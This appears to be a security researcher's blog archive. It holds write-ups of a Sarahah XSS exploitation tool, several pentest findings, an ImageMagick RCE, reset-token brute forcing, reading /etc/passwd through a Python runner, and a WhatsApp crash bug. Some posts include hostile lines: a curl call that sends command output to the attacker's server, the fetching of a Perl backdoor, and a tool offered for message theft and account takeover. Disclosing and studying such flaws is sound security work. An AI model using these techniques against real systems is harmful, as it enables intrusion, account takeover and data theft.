
About me

Shawar Khan is an Ethical Hacker & Security Researcher from Pakistan.

With years of experience in cyber security, Shawar Khan has identified major security flaws in well-known companies worldwide, including Google, Microsoft, PayPal, Apple and many others. A large number of Hall of Fame listings and certificates were awarded by these companies as a token of appreciation. In his spare time, Shawar develops exploits and web-app penetration testing tools, among them BruteXSS and D-TECT.


Personal info

Shawar Khan
A Web Application Penetration Tester and Security Researcher.

Skills & things about me
  • Web Application Penetration Testing
  • Mobile App Penetration Testing
  • Exploit Writing


My latest projects

Saturday, August 19, 2017

Sarahah XSS Exploitation Tool - Compromising Sarahah Users.

Disclaimer: This tool is built to demonstrate a pre-identified XSS vulnerability in Sarahah's web application. I'm not responsible for any damage done using this tool, as it's built for educational purposes only.

Note: The exploit code is included again as the vulnerability is now fixed.

Hello everyone, this is Shawar Khan and it's been a long time since my last write-up. Today I'm going to release one of my recently coded scripts, written to demonstrate the XSS vulnerability that was identified in Sarahah.

First I'd like to thank "Ronnie" for letting me know about the issue; you can find the article here.

The article demonstrates the XSS vulnerability in Sarahah properly. According to the article, the XSS is caused by insecure reflection of messages when new messages are loaded: new messages are not properly filtered. For example, if a user submits a simple <script>alert(1)</script>, the payload is executed when the message is loaded on the next page after scrolling down.

Sometimes an 'alert(1)' isn't enough to demonstrate :)

But wait, just an alert(1) isn't enough to demonstrate the issue, right? Many hackers and beginners think XSS is limited to alert(1) or a prompt dialogue. So I decided to change this concept and coded the exploitation script:

The script is able to perform the following actions:
  • Messages Capture
  • Email Change
  • Account Deletion

How does it work?

Basically, I've coded a separate exploit in JavaScript for each of these actions. The Python script injects the payload into a target account and then floods the user with around 20 messages, so the payload reaches the vulnerable area and executes on scroll.

The tool submits a script tag that uses eval with atob in order to bypass the protection deployed: the base64-encoded exploit code executes when it is passed through eval. The site returns an error if the message contains any '.' character, which is used to deny any message containing a link or domain. That protection is bypassed by encoding the payload in Base64 and passing it to atob inside eval. So the template looks like:


The site has implemented multiple protection mechanisms, which the tool bypasses. The script loads multiple proxies and submits the exploit code from different IP addresses to get around IP-based limits. This slows down performance but does the job.

Exploit Codes:

All the XSS exploits I've coded for Sarahah are available on my GitHub.

Account Deletion Exploit Code

Once the exploit code is loaded into the web application, a new invisible iframe element is created which loads the account deletion page. The page is then submitted using JavaScript, which deletes the account instantly. Due to the lack of clickjacking protection, we can interact with elements inside the iframe, which is what lets us delete the account.

Email Change / Account Takeover Exploit Code

This is another exploit, and it is high in impact: it takes over the user's account instantly. Once the code is loaded, the exploit loads the settings page in an iframe, changes the value of the email form field to the one provided by the exploit and submits the page, and the email is changed. Once the email is changed, one can request a password reset link to the new email and take over the account. The code for this is similar to the account deletion code, as they work in the same way.

Account Message Read and Capture

This is the best of these exploits: it goes through all the messages and captures them. Once the code is loaded, it iterates over every page of messages at '/Messages/GetReceivedMessagePage?page=', which, when requested with a specific page number, returns the messages as a JSON object. The response is captured and sent to a specified logger hosted by the attacker. The logger reads and parses the messages and returns them in a readable form.

Setting up your system before exploitation:

Modules Required  

  • requests
  • urllib3
  • urllib
  • urllib2
  • ssl
  • glob
  • cookielib
  • bs4 or BeautifulSoup

Before using it, make sure you have done the following:

  • CORS should be enabled
  • The logger (log.php) should be publicly accessible
  • The IP or domain where the files are hosted should have SSL deployed
  • The victim should not be an app user


Exploit in Action!

So, each exploit is submitted in a way the web application does not reject, as the code inside is base64-encoded and will not be removed. The code is then loaded by creating a new script element whose source is the exploit code available on GitHub.

Victim's Messages captured by Sarahah XSS Exploitation Script

Generating and Injecting Payload to victim's account


The following is a video demonstration of the Sarahah XSS Exploitation Tool:

Want the Script?

I've uploaded the script to my GitHub so you can use it. It's available here.


$ git clone https://github.com/shawarkhanethicalhacker/Sarahah-XSS-Exploit/
$ cd Sarahah-XSS-Exploit
$ python sarahah.py

One last thing, want to protect yourself?

This XSS vulnerability affects users who use Sarahah in a browser. Users of the mobile application for Android or iOS are not affected, as messages are properly protected there. So if you want to protect yourself from getting hacked, use Sarahah's mobile application.

Wednesday, May 24, 2017

Pawning the Web - Disclosing top 6 findings

Hello everyone, this is Shawar Khan and today I am going to disclose my top 6 findings, which I think were interesting and useful. I am disclosing them so that readers can apply the same methodology and techniques used in these tests. Firstly, I want to let you know that each flaw was reported to the vendors and company owners to prevent the risk, and I am not going to mention the company names, to prevent reputation damage.

The following are covered in this write-up:
  • Hacking the Repository and accessing the Private SMS API
  • Viewing Payment information via Insecure API
  • Hacking into the Wind Turbine Panel
  • Getting AES Key and Decrypting encrypted data
  • Pwning the server having 1 million users with ImageMagick RCE
  • Getting Ride Information of any user

These are the findings I am going to discuss in this write-up, so let's start!

Hacking the Repository & SMS API

Before we begin, I'd like to give an overview of what was done. While pentesting a web application, with a bit of enumeration I was able to get into an area holding the repository where all the source code of the web app was available. Through that I got into the SMS API, which I will show you in a while. The SMS API was used to send SMS from a specific SMS mask; it was actually used for sending 2FA/activation codes to mobile numbers from a special SMS mask.

Let's begin.
When pentesting an application, the most important thing is the information gathering phase: we have to get as much information about the target as possible. Many web developers leave sensitive files on the server, relying on their uncommon names. Those files are mostly not linked anywhere, so we have to enumerate and detect them. Similarly, many developers leave the Git directory (.git) in place after cloning a repository. This directory holds information about the Git repo and about all files that were added or deleted. If the Git repository requires authentication, developers sometimes leave their credentials in the config file. That is what happened here: first I found the .git directory by enumerating folders:
.GIT Directory Found with Nmap NSE Script

Now, if the .git directory is readable or has directory listing enabled, we can simply run the following command to get all the files available in that directory:
wget -m -I .git http://www.site.com/.git/
Using the above command and then the git status command, we can see all files added to and deleted from the web app; it gives us the whole structure and all hidden files. But what I found was something more interesting: the config file located in the .git directory held repository credentials. The following information was in the file:
Directory Listing in the .GIT directory

Repository Credentials Leaking in Configuration File

Now that's interesting! I got a new subdomain which was holding the repository. I could simply have cloned the entire web app using the git clone command, but first let's visit the new subdomain where the repository was hosted. By using the credentials found, I was able to access their dashboard:
Dashboard Accessed by using the Credentials found
After accessing the dashboard, I had access to multiple repositories and got all the source code and files, and also some sensitive server information like the database password and other details. After digging into it more, I cloned the repository which I guessed held sensitive information. The application appeared to use the Laravel PHP framework.
After reviewing each and every file, I found something interesting in the /app/Http/Controllers/Auth/ directory: sensitive information in the source code of a file located there, which appeared to be API information, and after confirmation I found 3 SMS APIs in use along with their credentials:
1st SMS API Information

2nd SMS API Information

3rd SMS API Information
Finally, I found 3 SMS APIs and their credentials. 2 of them were not working, as one was deployed on the devices they use. The 3rd API seemed to be working, and it had the same username that I had found in the config file at the beginning of the pentest. I tried the credentials found in the source code, but they did not work as the password was wrong. Bad luck! I tried the password from the config file and it worked; I guess that was the new password. I accessed the SMS API and was able to send SMS to any number with the "SMS" MSISDN mask!
SMS Sent via API with "SMS" MSISDN Mask

It wasn't only the SMS API hack; I also found some other serious issues that I haven't mentioned in this write-up. Just imagine the risk of leaving one file publicly available: due to that 'config' file I was able to access the SMS API. So that's it!

Getting Payment Information via Insecure API endpoint

So, here is another interesting discovery. Many people asked me to disclose some API issues, so I decided to disclose an interesting one. In this case I found an API endpoint where I was able to get information like the credit card number, location, user information and everything else used in the payment process, and I was also able to get a product for free.

Whenever you are testing for API issues, make sure to get all the endpoints and understand the logic and flow of the application. Once you know the application flow you will be able to detect API flaws. In this web app, a registration form has to be submitted in order to get to the product purchase page. Once the transaction is done, an Order/Transaction ID is sent over an insecure channel via the GET method. The order ID can be stolen easily, as it is not transferred securely.

Here is how the registration request looks:
Registration POST Request to Registration API end point
After registration the user is sent to the payment page, after which there is the final receipt page. When the payment process is completed, the receipt page sends a request to an API endpoint with the Transaction/Order ID. The API endpoint was:
A GET request to the endpoint above with the order ID results in the complete transaction information in JSON:

Transaction Information in JSON form

The 'get-lead' API endpoint shows complete transaction information when a Transaction/Order ID is entered. I tried some different order IDs that I had captured and was able to get the complete information of their transactions. In the image above the transaction information was for my own orderId, so I used null values to hide the info.
As the information was in JSON, I coded a Python script to automate the flaw and gather the information in a readable form:
Transaction information captured using Python Script

I used test information just to show you how it actually works; the real information was sensitive and can't be shown here publicly. Just by entering an order ID we can get complete transaction information. That's due to the insecure 'get-lead' API endpoint.

Hacking into the Wind Turbine Panel

I was given the IP address of a wind turbine panel for a penetration test. All I had to do was get into the password-protected panel, which held all the information about the wind turbine. Accessing the IP returned a panel:
Wind Turbine Login Panel
I tried different methods to bypass it and also checked whether it could be bypassed using SQLi, but that didn't work. Sometimes SQLi, response tampering or forced browsing bypasses password-protected areas, but in this case they didn't work, so I tried to understand the flow of the application and how the authentication process was done. Nothing special was found, except that the panel had a QR code. I tried a QR code reader and it redirected to a mobile panel: there was another panel specially designed for mobile browsers:
The difference between the two panels was that this one was fully based on JS; every functionality was executed using JavaScript. I started reading the source code of the panel and found a JS file which was handling the login process:
JS File that controls the entire Application

The 'my-app.js' file held the entire structure of the application behind the panel, and as it was based on JS we could directly call any function. Whenever I find a flow like this, I try to understand how a successful login is forwarded, so by reviewing the JS file I tried to understand the response of the application when a valid password is given. The 'logIn()' function is triggered when credentials are entered; after login, the site responds with a message that tells the JS application whether the login was successful or not. An IF/ELSE condition was used, but in an insecure way. The following is the insecure code snippet:
Insecure Code Snippet that led to Login Bypass
In the IF/ELSE condition, if the site responds with "usererror" or "pwderror", the login was not successful and the application executes 'myApp.loginScreen()', which shows the login panel. If the login is successful, the site returns the message "loginSuc" and the application executes the "allStart()" and "myApp.closeModal()" functions. The first function loads the functionality behind the login panel and the second closes the login panel and gives access to the dashboard. Time for fun! Let's bypass the panel.
I used invalid credentials to get the site's response:
The site responds with the 'usererror' message, which means the login was not successful. Let's change it to a valid response:
I changed the response to 'loginSuc' to fool the application, and boom! We got access to the dashboard!
Wind Turbine Speed & Temperature Stats

Wind Turbine Energy Consumption Stats

More Stats about the Turbines
That's it! We accessed the wind turbine panel!


Getting AES Key and Decrypting encrypted data

When pentesting an Android app, it's important to know how the application communicates with the web app; without that, it's tough to know the communication flow. I intercepted the application's traffic and found that the data sent via the 'params' parameter was encrypted:
Encrypted data being sent
Not only the data being sent, but also the response was encrypted:

So, both the data being sent and the data received from the web app were encrypted, and there was no way I could decrypt it. As the data was not in plain form, I was not able to understand how the application was communicating with the web app and what the web app was responding. I dug into the application itself; first I decompiled it using apktool:
apktool d application.apk
I also converted the 'dex' files to 'jar' using dex2jar:
dex2jar classes.dex
dex2jar classes2.dex

After decompiling and converting the dex files to jar, I read the jar file using the 'JD-GUI' tool, which is pre-installed in Kali Linux for reading jar files. After checking the hundreds of classes in the 'classes_dex2jar.jar' file, I found a class named 'AuthenticateParentActivity.class' which had something interesting.

I found the AES key that was used for decrypting and encrypting the data being sent and received! That's what we wanted, and now I was able to decrypt the data in both directions, which means the communication could be read!
Data successfully decrypted using the key! The key should never be hardcoded in the application or in any place that could be accessed by a user. I found some more flaws after decrypting the data, but I guess you've seen the interesting part. That's how I found the AES key and decrypted the data.

Pwning the server having 1 million users with ImageMagick RCE

So, here is one of the best RCEs I found; it was in a famous company with almost 1 million users. I was able to get into their servers by exploiting the ImageMagick service being used. When testing for remote code execution or file upload flaws, developers mostly miss some points at image upload or profile picture change areas. Similarly, in this case I found an image upload area. When exploiting ImageMagick, we have to create an image containing our command, which sends the reverse connection when a vulnerable function is applied to the image.

But in this case the commands were not working properly and I was not getting a reverse connection, so I tried executing a curl command with the ImageMagick exploit:
curl http://myserver/$(id)

and the command was executed! I got the output of the 'id' command executed on their server in my Apache logs:

The command was successfully executed, which means the server was vulnerable, but I needed a fully interactive shell. I tried executing telnet and bash commands to get a shell, but the reverse shell closed after 2 seconds. That's because the command stops executing once the code has run, so what I did was create 2 files:

one file for fetching the Perl backdoor from my server, and the other for executing the Perl shell.
I have uploaded both files to my GitHub repo so you can view them:
Launch.png & Make.png

Each file does one thing separately, which gives a fully interactive shell.
After uploading each file separately, I got the interactive shell! Rooted the server and got maximum privileges. That's it, ImageMagick exploited:


Getting Ride Information of any user

Here is another interesting API issue that I identified in a car service. Every pentest starts with information gathering; by gathering information about the target I found an administrator panel. The admin panel was password protected, but by gathering some information via Bing I found an API endpoint which showed the location of a ride. The logic of the application is: a user requests a ride and travels to a location, and the user gets a special Booking Id. The API endpoint shows the location where the user travelled, taking the Booking Id as input. The endpoint was similar to the following:
If the Booking Id in the URL is replaced with another number, it shows the location of the ride taken by that user. This flaw was found by gathering information about the target using Google dorks and Bing. Information gathering is one of the most important phases, and simple techniques can lead to serious risk. I gathered some Booking Ids so I could get some user information:

I coded an exploit for this issue; by entering a Booking Id the locations are captured:

I've uploaded the exploit code to my GitHub so you can see the code: Ride Information Gather Exploit
Just by finding insecure APIs in the target web application we can discover interesting issues. I hope you will love this.

Thanks for viewing, please share and comment if you like this write-up.


Shawar Khan
Security Researcher

Monday, May 1, 2017

My journey to Ethical Hacking

Greetings everyone, I hope you are all doing well. Today I want to share my journey to ethical hacking, the things I have experienced in my career and the things I did to become an ethical hacker. This article is meant to motivate young security researchers and beginners, so they can learn from what I have experienced and apply it in their own lives. So, everything started from an interest in computers, as I was a computer enthusiast. It is the dream of everyone interested in computers to learn as much about them as they can, and that was my dream too: I always wanted to know as much as I could. Back in 2011 some of my Facebook friends mentioned that their accounts had been hacked. At that time I had no idea what that meant; afterwards I came to know that someone had got their credentials, and I was shocked at how that was possible. Some days later one of my family members became a victim of a cyber-attack. That was when I had to do something about it. I tried contacting some people who claimed they were hackers and could hack into accounts; I spent a long time asking them for help, begging them to get the accounts back, and what I got in response was their laughter. Some people insulted me by saying that I had zero programming skills and could never learn this. Some said they learned it by learning programming, and some said they taught themselves. So that was, you could say, the turning point: no one helped in that tough time, so I decided to learn something on my own.

Well, I started googling how to hack things, and like everyone else, what I got was some weird Facebook hacking software that never actually worked. I learned that those were not the way to hack into anything. The rejections and demotivation always kept the passion alive, and I kept on searching and ended up with phishing attacks and keylogging. I became familiar with those tricks and found them useful, and after some successful attempts I started learning more about how these things happen. This was the skill I had always wanted to attain. But I found that these were a dead end. In such situations what I always do is switch to something else and learn new things, so I did the same and found some posts by people who had hacked into websites. I was amazed to see how they got control over an entire website, which was new to me, and I tried googling once again, as there was no one to help me. I found methods like SQL injection, with which I was able to get into a site's database, where all the information and passwords were stored. I learned that technique and found admin credentials, but I was not able to go further as the passwords were hashed (not in clear form, not readable). I left that for a while, as I was not able to find the solution and was struggling on my own, and then I found some online sites, like hashkiller, which were able to crack hashes. I used them to get into the website, and that was the fun part where I got control over a website. What I wanted to do next was learn more, as I always do, because I wanted to achieve more in what I was doing. I watched some YouTube videos and learned about shelling, rooting and compromising cPanels. After learning all this I was able to hack into websites, computers and accounts.

So after doing those things for a while I felt like the cycle was repeating again and again. Just like other defacers and hackers I had got into something repetitive, and what I wanted was to achieve more rather than just repeating things. I knew how insecure people and websites were, and as I had been a victim of cyber attacks, so were they. I always wanted to help people so they could survive the situations I had experienced. At that point I wanted to get out of the repeating cycle (loop). I discovered that there were hackers who were helping people, and I saw people getting listed on websites and receiving gifts. That was the good side, where I always wanted to be, and it was ethical hacking, the positive use of the skills, which is what I wanted to do. I reported the vulnerabilities (security flaws) I had discovered in the early days to the website owners.

This was the time when I turned into a white hat. I reported flaws to famous companies like BMW and others. The responses were really motivating, and that was something that kept the passion alive. I kept reporting to random sites, and all I knew at that time were two attacks (XSS and SQLi). I reported these issues to over 20 sites, and one of them asked for my address to give me a gift. I was really happy to hear that, and it was a watch that I received from a company in Hong Kong. For a normal person like me it was a great achievement to receive a watch from an international company, as I had never received any gift before (I still keep that watch just to remember what I was in the past). A few sites listed me on their Hall of Fame pages, where the names of security researchers who helped secure their sites are mentioned. When I got 3 Halls of Fame, an announcement was made at my school to appreciate me, and I was interviewed by a company. It was quite impressive. I set a target of 15 Halls of Fame, which I reached in a short time, and as I wanted to achieve as much as I could, I kept hunting websites and helping them get secure.

I was a normal guy hunting sites with XSS and SQLi only. Almost every report was an XSS vulnerability, as I knew nothing else at that time. I made some friends on social networks and helped them learn new things. I was satisfied with what I had achieved, and my next goal was to help people who were suffering from the situation I had been in. I wrote some articles and released some videos of how I had hunted each site, so people could learn from them. I suggested books to people and helped them in each and every situation, because I never wanted them to face the rejections and demotivation that I had faced. I started learning more techniques from Google and ended up with books like "Web Application Hacker's Handbook" and "OWASP Testing Guide v4". These books were available for free in PDF form. I gave some time to them and studied them. It was really tough for me to learn all that, so I learned about how web apps work and about different CMSs (Content Management Systems). I wanted to focus more on XSS, as I was familiar with it, so I watched videos and conference talks on YouTube, which gave me a quick push towards penetration testing.

I learned some new attacks and felt that I was in the right place, and all I needed was experience so I could learn more (I never wanted the cycle to repeat). Once I had enough experience and knowledge, I started training people who were new to cyber security and hacking. It was quite a good time, as I learned a lot from teaching them, and it is always satisfying when you are training someone. But at the same time I found that some people were still into bad things, like defacers who are still defacing people's sites. They are still targeting people for no reason except stamping their name and proving that they owned the site. I talked to some of them and focused on helping them get onto the right side; I wanted to bring their skills to the good side, because for a limited time it was fun, but they had no idea what they were doing.

Finally, after some struggle, I was able to change their minds and they came over to the good side, ethical hacking. Those people are now well-known ethical hackers; many of my students got hired by companies, and many of them are in the news and have been interviewed by top companies. It is always good to help people get on the right path, no matter what you have to sacrifice. No matter what position you are in today, always remember who you were in the past, and all you have to do is help people rise so they can further help the people who are down.

To all the hackers, beginners and people reading this, I'd say: attain the skill, contribute to the community, help those who are really in need, and you will get a satisfaction you never had. As a security researcher, just make sure to always be on the good side. This isn't limited to hacking: being on the good side, you should also help the community and people, so they can achieve the skill and learn the positive use of it.

Rising from a normal guy to a security researcher isn't an easy journey. People will always demotivate you, reject you and let you down, no matter what. This is the stage that is really difficult to face, and the only thing every person should learn is to keep the passion alive and keep themselves up.

Still many people try to defame me by targeting my social accounts, website and so on, but they can never stop me from achieving my goals and can never destroy the passion I have. When I was admitted to hospital, my website was compromised and people started judging my skills, but what they say doesn't matter; all you have to do is find self-satisfaction, and no one except you knows who you really are. People in the community should help each other rather than putting people down and stopping them from achieving their goals. Being a hacker isn't the important thing; being a successful person is the important thing, and that can only be done by helping the community rise.

As a security researcher, it is really tough to keep yourself up to date. I'd ask beginners to focus on self-study and learn things by themselves, as everything is possible; all you need is the passion to take a step, and after that you can achieve anything. The passion is still there, and I am using my skills to help people get secure in cyberspace. Now I am listed in almost 90+ Halls of Fame, have 30+ certificates, and have been acknowledged by over 300 well-known companies, among them Google, Microsoft, Oracle, Sony, Dell, Amazon and eBay. These are just a few of the companies, and I am glad that I finally proved that nothing is impossible to achieve. All of it was achieved by self-study and self-motivation, without any certifications. You are never a perfect person, but you are still better than the rest. For being a security researcher, all it takes is the passion to achieve something. I hope this article helped motivate you to take a positive step in life. Share the article so we can help the community rise 🙂

Shawar Khan
Security Researcher

Wednesday, April 12, 2017

Pwnage of every user due to Weak Encryption

Greetings everyone, this is Shawar Khan and today I want to share one of my recent findings. Recently, while pentesting a private project, I came across a type of weakness in the web application that I am going to share today. The application I was testing was fully accessed by the end of the penetration test, but in this write-up I am only disclosing one issue which I think is interesting, so that developers and researchers can look for it while performing pentests against web applications.

    So, I started the pentest against the web application and checked every area which was publicly available, and found some flaws. After that was done, the next step was to check the authentication mechanism.
    As we know, critical flaws are discovered in the functionality that is responsible for changing user passwords, so I moved towards the password reset functionality.

    I simply registered an account and requested a password reset; the reset link looked like this:

    Password Reset Link sent to User's Email via Web-App
    Once the password reset link is requested, an email is sent to the address associated with the user's account. The email contains a link, as shown above, which carries "email" and "token" parameters. These parameters tell the web application that the specific user wants to change their password. The "email" parameter's value is the email of the user requesting the password change, and the value of "token" is an MD5 hash.

    How does the hash work in this mechanism?

    Each hash that is sent in a password change request is associated with a user account, so if the token (hash) matches the email it was issued for, the password change is allowed. Otherwise, the password change request is rejected because the hash doesn't match the email.

    Exploiting the mechanism

    Now that we understand how it works, it's time to exploit it. I tried replacing the 'email' parameter's value with someone else's email address to check for an IDOR vulnerability, but that didn't work. In this type of situation the only option is to check how the hash was generated.

    The hash was identified as MD5, so I tried cracking it and successfully recovered the plaintext behind the hash that was sent in the reset link. In my case the hash was "d9d4f495e875a2e075a1a4a6e1b9770f":
    Cracking the Password Reset Hash

    So the value behind the hash was "46". We now know that they are using numbers as tokens. Now it's time to check whether the same number was used as the token for every requested link. I requested some more links and cracked their hashes:
    Cracking 4 Password Reset Hashes
    After a little observation I found that the numbers were all between 0 and 1000. None of them exceeded 1000, so they are probably using some kind of random function to generate numbers within that range. Now that we know how the hashes were generated, it's time to fire up the weapons. We can brute-force the password reset link hash, but first we need to create the list of payloads.

    I coded a little script that generates the MD5 hashes of the numbers from 0 to 1000:
    Generation of MD5s
    Now we have a list of hashes for 0-1000 that we will use to brute-force the "token" parameter; one of them will be the correct value that resets the user's password. I coded a script that takes those hashes, brute-forces the "token" parameter, and prints the valid hash and the URL for resetting the password of the specified user.
    So the final exploit looks like this:
    Final Exploitation
    So, as we are now able to produce a valid password reset hash for any user of the site, we can compromise any user's account just by entering their email. One of the requests in the 0-1000 range will succeed, which allows us to take over the account.
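As an added example (not the author's scripts from the GitHub repo), the following Python shows why a token built as MD5 of a number in 0..1000 is guessable, how a tester or developer can flag such a token during a review, and what a reset token should look like instead; the function names and the 1000 limit are assumptions taken from the post.

```python
import hashlib
import hmac
import math
import secrets
from typing import Dict, Optional


def md5_hex(value: str) -> str:
    """MD5 of a string, hex encoded (the token format described in the post)."""
    return hashlib.md5(value.encode()).hexdigest()


def weak_token_space(limit: int = 1000) -> Dict[str, int]:
    """Every token that a 'random number in 0..limit, then MD5' scheme can
    produce. The whole space fits in one small dict, which is the problem."""
    return {md5_hex(str(n)): n for n in range(limit + 1)}


def audit_reset_token(token: str, limit: int = 1000) -> Optional[int]:
    """Return the integer behind a token if it is MD5(n) for some n in
    0..limit, otherwise None. A non-None result means the token is guessable
    in at most limit+1 requests, regardless of which email it was issued for."""
    return weak_token_space(limit).get(token.strip().lower())


def token_bits(limit: int = 1000) -> float:
    """Entropy of a uniformly chosen number in 0..limit, in bits."""
    return math.log2(limit + 1)


def generate_reset_token() -> str:
    """A reset token drawn from the OS CSPRNG: 32 bytes, 256 bits of entropy."""
    return secrets.token_urlsafe(32)


def verify_reset_token(stored: str, presented: str) -> bool:
    """Constant-time comparison, so the check does not leak the stored token
    through response timing."""
    return hmac.compare_digest(stored.encode(), presented.encode())


if __name__ == "__main__":
    page_token = "d9d4f495e875a2e075a1a4a6e1b9770f"  # the token quoted in the post
    print("number behind the post's token:", audit_reset_token(page_token))
    print(f"weak scheme: {token_bits():.1f} bits of entropy; secure token: 256 bits")
    fresh = generate_reset_token()
    print("secure token found in the weak space?", audit_reset_token(fresh))
    print("verify(good, good) =", verify_reset_token(fresh, fresh))
    print("verify(good, tampered) =", verify_reset_token(fresh, fresh + "x"))
```

In a real reset flow the generated token should additionally be stored hashed, bound to the requesting account, single-use and time-limited.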

    That's it!
    I hope you like this write-up; make sure to share it so people can learn from it.


    The following is the GitHub link to the scripts I coded for exploiting this weakness:
    Github: Github Repo

    Monday, April 3, 2017

    How I was able to read server files with Python

    Greetings everyone, this is Shawar Khan and I hope you are all doing well. It's been a while since my last write-up, so I decided to disclose one of my recent findings, identified in a top web application. Recently I found an issue that allowed me to read files on the server with Python due to a lack of protection, and I will show you how I did it. It's quite simple.

    While I was practicing Python coding I decided to try my scripts on web apps; there were a few applications that were using Python and let me execute Python code. Some of these are online tools that execute code in various languages. Python is a simple and powerful language, with an easy syntax and powerful control. There are many commands and modules that can be used to compromise systems and applications, but in this write-up I will only demonstrate how I read the files.

    So, let's move on to the interesting stuff. I went to the area where Python execution was possible; a simple "print('Shawar Khan')" command returned the following result:

    As you can see, after the "Output:" label you see the result of the command. Now the first thing that comes to mind when executing programs is running system commands, so I tried executing a system command using the "os" module:


    import os  # system-command execution through this module was blocked by the runner


    The system command was not executed, as the "syscall" was blocked; they were not allowing us to execute system commands, so I tried the "subprocess" module to do the same trick:


    import subprocess  # blocked in the same way as os


    Okay, so it was the same issue with this one: they were blocking everything that executes system commands, so this trick failed. In similar cases we are able to execute system commands and gain full control over the server, but in this case I skipped that and moved on to reading server files. I tried 'open()' to open or create a file on the server.

    I found that the server was not giving me write permissions, so I was not able to write files on the server, but I was able to READ files, which means I had read permissions. Using that, I was able to read server files by opening them directly with 'open()' in read mode. The following was my code for reading the /etc/passwd file:


    # Open the file read-only and print each line without its trailing newline
    with open('/etc/passwd', 'r') as f:
        for line in f:
            print(line.strip('\n'))


    So, I was successfully able to read files on the server, since I had read permissions. These simple tricks can be handy while performing pentests against web apps like these.
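As an added example (not the vendor's sandbox and not the author's code), this Python uses the ast module to flag submitted snippets that touch the three things the post walks through, the os and subprocess modules and the open() builtin, so that an online runner can log or reject them before execution; the blocklists and the constructed sample snippet are assumptions.

```python
import ast
from typing import List, Tuple

# Constructed policy (not the vendor's): the modules the runner in the post
# blocked, plus the builtins that give file access or dynamic code loading.
BLOCKED_MODULES = {"os", "subprocess"}
BLOCKED_CALLS = {"open", "__import__", "eval", "exec"}


def audit_snippet(source: str) -> List[Tuple[int, str]]:
    """Return (line, reason) findings for a submitted snippet, sorted by line.

    This is a detection aid for reviewing or logging submissions. It is not a
    sandbox: the runner must still deny file and process access at the OS
    level, because a source-level check can be evaded."""
    try:
        tree = ast.parse(source)
    except SyntaxError as exc:
        return [(exc.lineno or 0, "syntax error: snippet could not be parsed")]
    findings = []
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            for alias in node.names:
                if alias.name.split(".")[0] in BLOCKED_MODULES:
                    findings.append((node.lineno, f"import of {alias.name}"))
        elif isinstance(node, ast.ImportFrom):
            if (node.module or "").split(".")[0] in BLOCKED_MODULES:
                findings.append((node.lineno, f"import from {node.module}"))
        elif isinstance(node, ast.Call):
            if isinstance(node.func, ast.Name) and node.func.id in BLOCKED_CALLS:
                findings.append((node.lineno, f"call to {node.func.id}()"))
    return sorted(findings)


# Constructed sample: the three steps the post describes, in one submission.
SAMPLE = """import os
import subprocess
f = open('/etc/passwd', 'r')
for line in f:
    print(line.strip('\\n'))
"""

if __name__ == "__main__":
    for line, reason in audit_snippet(SAMPLE):
        print(f"line {line}: {reason}")
```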

    That's it, share the write-up if you like it!

    Tip:~$ #Where there's a Python, there's a way.

    Sunday, March 5, 2017

    WhatsApp - 0day Vulnerability in iOS & Android

    Greetings Everyone

    Today we are going to share the 0day that we discovered in WhatsApp. Our team (Muhammad Uwais, Kunal Khubchandani & Shawar Khan) identified a 0day vulnerability in the WhatsApp mobile applications (iOS & Android). The details are as follows:

    Bug: Buffer Overflow App Crash Denial of Service Vulnerability
    Affected Versions: All WhatsApp versions prior to "2.17.79"

    Platform: iOS & Android
    Researchers: Muhammad Uwais, Kunal Khubchandani, Shawar Khan
    This vulnerability allows a remote attacker to crash the target victim's mobile application. This affects both versions of WhatsApp, WhatsApp for iOS and WhatsApp for Android.

    Recently Uwais joined WhatsApp and started a pentest against the application, as that's what a hacker does at the start: identifying security flaws is the first step every hacker performs. A flaw had recently been discovered that allowed attackers to crash a victim's WhatsApp by sending a message containing unknown characters, and recently someone found that he could crash the WhatsApp iOS version with 2 emojis, namely the rainbow and the white flag. According to Uwais:

    I decided to make up a contact file and add a few "Smiley Face" emojis in the contact name field that is shared. Luckily my mobile, a Xiaomi Mi 3, allowed me to add as many emojis and characters as I wanted. Then I shared this contact and nothing happened, so I added a bomb emoji along with the other 30 smiley face emojis. Then I sent the contact to Kunal, and while opening his chat I noticed a slight delay of 1.5-2 secs compared to the usual time for opening his chat.
    Uwais noticed this behaviour and asked Kunal to have a look into it, because of limited access to computers at my college.

    So he made another contact, i.e. the contact named with bomb emojis which caused the delay; then Kunal copied that message (contact), added only "bomb" emoji characters, and kept on multiplying the bomb emojis while testing the response (delay) in opening the conversation (message).

    He noticed a lot of serious lagging, and I couldn't type back in the conversation while testing on the Android application. Again he added more and more bomb emoji characters, around 5000, then he sent the contact to me on my phone; as soon as I opened his chat the mobile screen turned black and bamm, WhatsApp crashed!! As some phones couldn't store emojis as the contact name, he used a 3rd-party app from the Play Store to create a contact like that. As for now we are sure all Android devices along with their WhatsApp versions were affected if a contact was shared with a name containing around 5000 bomb emojis.

    It was time to test iOS devices, so we messaged another friend named Shawar Khan, who is also a Cyber Security Researcher & WhiteHat Hacker from Pakistan, and we asked him to test an iOS device as he is an iOS Application Penetration Tester.
    I (Uwais) sent him the same contact, and this time the results we noticed were crazy.

    His phone started lagging and his WhatsApp crashed on pressing the home button on his iPhone. The payload was further modified by Shawar and a much more powerful payload was created, which caused a complete application crash on the victim's device. To handle such a huge payload a powerful device was required, as Android devices were not able to handle it; an iPhone 6s was used to send the modified payload and was successfully able to take down any WhatsApp conversation / group.

    So finally we confirmed that it affects every phone, whether it's iOS or Android 😉 .

    All versions prior to 2.17.79 were affected. Along with the app crash, the main iOS was also affected.
    The vulnerability was reported to Facebook and is now fully patched.

    Android to Android (Demo by Kunal)

    iOS to Android (Demo by Shawar Khan)


